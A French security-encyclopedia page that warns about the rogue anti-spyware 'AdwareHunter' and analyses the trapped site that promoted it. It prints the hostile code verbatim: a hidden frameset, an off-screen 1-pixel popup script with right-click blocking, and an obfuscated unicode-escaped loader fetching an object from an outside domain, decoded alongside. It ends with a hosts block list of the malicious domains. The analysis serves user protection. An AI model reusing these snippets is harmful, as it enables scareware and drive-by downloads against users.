Adwarehunter - Attention
     Adwarehunter
Adwarehunter En français Logiciel "crapware" inutile ou piégé ou trompeur ou frauduleux ou crapuleux
Ne pas télécharger - Ne pas utiliser - Ne pas acheter - Ne pas tester
Fraude ou tromperie ou crapulerie ou piège

Adwarehunter En français  Software “crapware” useless or trapped or misleading or fraudulent or villainous
Do not download - Do not use - Do not buy - Do not try
Fraud or racket or villainy or trap
Adwarehunter

            Nom
  Adwarehunter 

Groupe   (Pas identifiée) 

Classe   Anti-spywares; Anti-adwares (Classe des anti-trojans) 

Autres noms    

Observations  
AdwareHunter ( Adware Hunter )

Utilise la technique du téléchargement silencieux (drive by download) conduit par des popup invisibles (ou des Web Bug) sur des sites affiliés et piégés, puis affiche aussitôt, quasiment en plein écran, une popup effrayante. Cette image est l'archétype des popup tentant de vous faire peur. Le Web Bug invisible est lui-même encapsulé dans un frame invisible exécutant quelques scripts additionnels, le frame visible ouvrant en pleine fenêtre sur le véritable site de microsoft, MSN.com.

Analyse de l'un des sites piégé :
L'un de ces sites piégés est http://www.browser-page.com/my_home.html. Le premier frame, dans le frameset ci-dessous, est invisible et va chercher http://www.browser-page.com/2top.html).

<frameset framespacing="0" border="0" frameborder="0" rows="21,1%">
<frame name="top" src="2top.html" marginwidth="0" marginheight="0" scrolling="no" target="_self" noresize>
<frame name="bottom" src="http://www.msn.com" marginwidth="0" marginheight="0" scrolling="auto" noresize>
<noframes>
<body>
</body>
</noframes>
</frameset>

Le frame caché exécute le script suivant dont la fonction est d'aller chercher une page html (qui est la popup ci-dessous) à http://www.adwarehunter.com/index/removaltool/Computer_Error.htm et de l'afficher par dessus la page du site MSN, 1 seconde après. Un son est joué et, simultanément, votre lecteur de cd-rom s'ouvre.

Nota : lors d'un nouveau test du 07.08.04 le script ne va plus chercher http://www.adwarehunter.com/index/removaltool/Computer_Error.htm mais http://www.spywareprotector.com/Computer_Error.htm.

<SCRIPT LANGUAGE="JavaScript">
<!-- Begin
closetime = 20; // Close window after __ number of seconds?
// 0 = do not close, anything else = number of seconds
function Start(URL, WIDTH, HEIGHT) {
windowprops = "left=5000,top=5000,width=" + WIDTH + ",height=" + HEIGHT;
// La position de la fenêtre est cachée (fenêtre invisible)
// Elle est affichée à partir du pixel 5000 en hauteur et du pixel 5000 en largeur soit à l'extérieur de l'écran
// Les résolutions d'écrans étant de 800*600 ou 1024*768, au maximum, 1600*1200, cette fenêtre ne sera jamais visible

preview = window.open(URL, "preview", windowprops);
if (closetime) setTimeout("preview.close();", closetime*1000);
}
function doPopup() {
url = "http://www.adwarehunter.com/index/removaltool/Computer_Error.htm";
width = 1; // Cette largeur de 1 pixel rend la pop-up invisible
height = 1; // Cette hauteur de 1 pixel rend la pop-up invisible
delay = 0; // Délais en seconde avant l'ouverture de la popup
timer = setTimeout("Start(url, width, height)", delay*1000); // Attente d'1 seconde (1.000 millièmes de sec.) afin de déjouer certains anti-popup primaires
}
// End -->
</script>
</head>
<body OnLoad="doPopup();" topmargin="0" leftmargin="0" bgcolor="#004E82">
<script language=JavaScript>
<!--
var message="";
function clickIE() {if (document.all) {(message);return false;}}
function clickNS(e) {if
(document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {(message);return false;}}}
if (document.layers)
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}

document.oncontextmenu=new Function("return false")
// -->
</script>

Et voici la popup de fausse alerte qui s'affiche, bien effrayante. En gros, elle dit : Téléchargez tout de suite mon utilitaire sinon vous êtes mort !




Simultanément, le tirroir du cd-rom s'est ouvert. Le code pour ouvrir le cd-rom est un bête script Java, mais il est crypté :

<script type="text/javascript">document.write('\u003c\u0073\u0063\u0072\u0069\u0070 \u0074\u0020\u006c\u0061 \u006e\u0067\u0075\u0061\u0067\u0065\u003d\u006a\u0061\u0076\u0061\u0073\u0063 \u0072\u0069\u0070\u0074 \u003e\u000d\u000a\u0076\u0061\u0072\u0020\u006f\u0050\u006f\u0070\u0075\u0070 \u0020\u003d\u0020\u0077 \u0069\u006e\u0064\u006f\u0077\u002e\u0063\u0072\u0065\u0061\u0074\u0065\u0050 \u006f\u0070\u0075\u0070 \u0028\u0029\u003b\u000d\u000a\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e \u0020\u0073\u0068\u006f \u0077\u0050\u006f\u0070\u0075\u0070\u0028\u0029\u000d\u000a\u007b\u000d\u000a \u0009\u006f\u0050\u006f \u0070\u0075\u0070\u002e\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e \u0062\u006f\u0064\u0079 \u002e\u0069\u006e\u006e\u0065\u0072\u0048\u0054\u004d\u004c\u0020\u003d\u0020 \u0022\u003c\u006f\u0062 \u006a\u0065\u0063\u0074\u0020\u0064\u0061\u0074\u0061\u003d\u0068\u0074\u0074 \u0070\u003a\u002f\u002f \u006f\u0062\u006a\u0065\u0063\u0074\u002e\u0070\u0061\u0073\u0073\u0074\u0068 \u0069\u0073\u006f\u006e \u002e\u0063\u006f\u006d\u002f\u0076\u0075\u0030\u0038\u0033\u0030\u0030\u0033 \u002f\u006f\u0062\u006a \u0065\u0063\u0074\u002d\u0063\u0030\u0030\u0031\u002e\u0063\u0067\u0069\u003e \u0022\u003b\u000d\u000a \u0009\u006f\u0050\u006f\u0070\u0075\u0070\u002e\u0073\u0068\u006f\u0077\u0028 \u0030\u002c\u0030\u002c \u0031\u002c\u0031\u002c\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e \u0062\u006f\u0064\u0079 \u0029\u003b\u000d\u000a\u007d\u000d\u000a\u0073\u0068\u006f\u0077\u0050\u006f \u0070\u0075\u0070\u0028 \u0029\u000d\u000a\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e') </script>

Ce qui nous donne, une fois décrypté :

<script language=javascript>
var oPopup = window.createPopup();
function showPopup()
{
oPopup.document.body.innerHTML = "<object data=http://object.passthison.com/vu83003/object-c001.cgi>";
oPopup.show(0,0,1,1,document.body);
}
showPopup()
</script>

Le site et le produit semblent ne plus exister. Le site piégé existe toujours et, au 07.08.04, exploite exactement le même piège au profit de SpywareProtector.

 
RogueRemover Pro
SmitFraudFix
  Empêchez l'installation, même par erreur, de crapuleries : RogueRemover et RogueRemover Pro.

Protégez-vous avec nos kits de sécurité.

Tromperie Ce produit est trompeur. Il prétend découvrir quelque chose là où il n'y a rien à découvrir afin de vous inquiéter et vous conduire vers un acte d'achat d'un produit dont il fait la promotion ! (Ne pas confondre les "résultats trompeurs d'une démonstration" qui sont de pseudos résultats forgés (fabriqués), d'avec les "faux positifs" qui sont des résultats erronés provenant d'une analyse réelle (mauvais programme et / ou mauvaise base de signatures, par exemple).
 

Agression / Peur Les vendeurs de ce produit tentent de vous faire peur. Par diverses méthodes (démonstration trompeuse, techniques de déstabilisations psychologiques par le biais de fausses annonces alarmantes, publicités agressives et intrusive (pop-up, faux éléments graphiques, fausses fenêtres, faux avertissements, fausses alarmes), mouvements mécaniques (ouverture d'un lecteur) provoqués, bluff, menaces, harcellement, conseils, caractère d'urgence, pressions etc. ...) le vendeur tente de vous affoler et alarmer afin de vous conduire vers un acte d'achat immédiat et irréfléchi. Se base sur diverses techniques d'ingénierie sociale.
 

Faux (positifs / négatifs)    

Usurpation / Hijacking    

Installation silencieuse    

CyberSquatting    

Piratage logiciel    

Piratage BdD  

Trojan  

Témoignages  

Conditions
Vie Privée
Privacy
 

Conditions
Clauses Générales du site
Terms
 

Conditions
Agrément de licence
Eula (End User Licence Agrement)
 

Version d'essai
Trial
   

Rédemption  
 

Mettre en liste noire   Les domaines (sites) et machines suivants peuvent être bloqués.

Utilisez Hosts pour bloquer les domaines suivants.
browser-page.com
adwarehunter.com
object.passthison.com
passthison.com


Utilisez votre pare-feu pour bloquer les machines suivantes (adresses IPs).


Analyse du code   Analyse pas encore effectuée (ou absence du code dans ma collection - pourriez-vous m'indiquer un lien de téléchargement de ce code)


     
Données pour chercheurs
   
Url du téléchargement    
MD5    
SHA1    
Programme d'affiliation    
Registrant    
Registrar    
     
Précautions d'usage  

Prenez l'habitude d'analyser tous vos téléchargements avant de les utiliser !
Analyse gratuite en ligne d'un fichier avec "VirusTotal" (32 antivirus et anti-trojans)
Analyse gratuite en ligne de votre machine par Trend Micro HouseCall
Scans de ports en ligne
Scans de failles en ligne
 
Lancer un désinstalleur avant d'installer un programme (téléchargé ou non ) !
Total Uninstall
Ashampoo UnInstaller Suite

     
En savoir plus  
Google   Google Adwarehunter
Google adwarehunter
Google (Pas identifiée)
Google Adwarehunter (Pas identifiée)
A l'aide !   Adwarehunter En français Forum
Adwarehunter En français Forum HijackThis Analyse de logs (type HijackThis...)
Décontamination   Protocole d'auto-décontamination simple suivi d'une demande de vérification
Protocole d'auto-décontamination étendu - "La Manip"
Installez un Kit de sécurité
     
Précisions / Informations  
Merci de me signaler les erreurs et omissions.

En français Contact informatif à propos de cette fiche:
Afin de fournir une information correcte, précise et à jour, j'encourage l'éditeur de ce produit ou service à me contacter si la moindre partie de cette fiche est à réviser.

En anglais Contact information about this card:
In order to provide correct, accurate and up to date information, I encourage the editor of this product or service to contact me if any part of this card is to be revised.



Information sur le document original :

© Pierre Pinard et Assiste.com - 1999 • 2007. Ce document, intitulé « », dont l'url est « », est extrait de l'encyclopédie de la sécurité informatique «http://assiste.com». Il est mis à votre disposition selon les termes de licence «Creative Commons» qui s'imposent à vous. Vous avez le droit de copier et modifier la copie de cette page dans les conditions fixées par cette licence et tant que cette note est reproduite intégralement et apparaît clairement dans la copie ou la copie modifiée. Lire les conditions de la licence.


Vie et maintenance du site

Vous avez trouvé de l'aide ? Ces pages vous ont été utiles ? Soutenez le site par une donation.
    
Donation avec PayPal Donation par chèque Donation par lettre Autres donations


 Google   Yahoo!   Ask Jeeves   AllTheWeb   Msn   Lycos   Technorati   Feedster   Bloglines   Altavista   Voila

 Rechercher " "
 Google   Yahoo!   Ask Jeeves   AllTheWeb   Msn   Lycos   Technorati   Feedster   Bloglines   Altavista   Voila
 Google   Yahoo!   Ask Jeeves   AllTheWeb   Msn   Lycos   Technorati   Feedster   Bloglines   Altavista   Voila

Historique des révisions
Proposer une mise à jour du site, une révision, une correction, un complément sur cette page

10.09.2006

Dernière modification le samedi 2 juin 2007
 
   
Rédigé en écoutant :
Music